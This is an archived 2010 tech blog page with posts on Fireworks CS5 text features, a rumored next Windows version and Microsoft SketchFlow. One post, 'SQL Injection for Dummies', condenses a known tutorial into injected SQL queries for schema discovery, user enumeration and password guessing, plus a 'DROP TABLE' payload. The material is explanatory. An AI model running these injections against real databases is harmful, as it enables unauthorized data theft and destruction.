Wednesday, May 26, 2010

Fireworks CS5: New Text Engine Features

Kerning, tracking and leading between characters in a text block can now be easily controlled using only the keyboard (simply put the cursor in between characters and use the keyboard arrow keys).

The slider value for kerning and tracking has been increased to 200.

If you open a PNG file created in Fireworks v. CS3 or lower, the kerning and tracking values will be automatically mapped and the look of the text will be preserved.

A new option (unique to Adobe Fireworks) allows you to multi-select characters and words in a text box and then style them together at once. This is complemented by another new option that allows you to auto-select similarly styled characters, words or paragraphs inside a text block, and then modify their styles at once.

An editable and auto-completing font list box feature has been added (Windows version only).

Now, you don’t need to restart Fireworks after installing a new font (Windows version only).

Undoing (Ctrl/Cmd + Z) and redoing (Ctrl/Cmd + Y) at the character level is now possible while you’re in text-editing mode.

Double-clicking selects the word, and triple-clicking selects the entire paragraph.

In the Layers panel, text object layers are now marked with a tiny “T” icon, for easier recognition.

A Text Overflow indicator appears when extra characters (that don’t fit the text-in-path or text-on-path) exist.

Copying and pasting text from any version of Microsoft Office into Fireworks is much improved.

The number of characters that can be copied and pasted into a Fireworks text block at once has been increased from 2000 to 8000.

Nishan Shanaka Korala Gamage
Colombo, Sri Lanka
Author: Eye Think

Next Windows version? The Future of PCs?

In one of the posts on the MSDN Blogs, the product manager working along with the Windows Update team discussed about what’s coming in the next version of Windows.The post appears to have now been removed by Microsoft.

But here is the extract:

"Folks started asking me whats in "Windows 8" – and the first thing I have to say is that I resonate Steven Sinofsky’s interview on who said we’re calling it "Windows 8"?

The minimum that folks can take for granted is that the next version will be something completely different from what folks usually expect of Windows

Microsoft to come up with a vision for Windows.next is a process that is surreal! The themes that have been floated truly reflect what people have been looking for years and it will change the way people think about PCs and the way they use them. It is the future of PCs…"

Source: http://www.thewindowsclub.com/microsoft-who-said-were-calling-it-windows-8#ixzz0ozyKw8jO

Monday, May 24, 2010

SQL Injection for Dummies


This is pretty old but pretty cool!

The original article for this could be found on
http://unixwiz.net/techtips/sql-injection.html

Schema field mapping
SELECT fieldlist
FROM table
WHERE field = 'x' AND email IS NULL; --';

SELECT fieldlist
FROM table
WHERE email = 'x' AND userid IS NULL; --';

result can get several valid field names:
email, passwd, login_id, full_name

Finding the table name
SELECT email, passwd, login_id, full_name
FROM table
WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';

SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' AND members.email IS NULL; --';

Finding some users
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' OR full_name LIKE '%Bob%';

Brute-force password guessing
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'bob@example.com' AND passwd = 'hello123';

The database isn't readonly
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x'; DROP TABLE members; --'; -- Boom!

Thursday, May 6, 2010

MIcrosoft defines SketchFlow

SketchFlow prototypes are designed by drawing out flow diagrams, composition, screens and states of an application UI.


You can use drawing tools, sticky notes, WPF or Silverlight controls and components, as well as imported images to iterate on and visualize your ideas quickly. SketchFlow even comes with a set of sketch styles for the standard platform controls, helping you present your work with a consistent “prototype” look to keep focus on the concepts presented. Using animation, you can illustrate design intent for dynamic interactions and application transitions easily.

SketchFlow lets you create, test, iterate, present and evaluate ideas in rapid succession, enabling you to consider approaching projects that previously would not have been cost effective or profitable.


Check out this URL form more
http://www.microsoft.com/expression/products/Sketchflow_Overview.aspx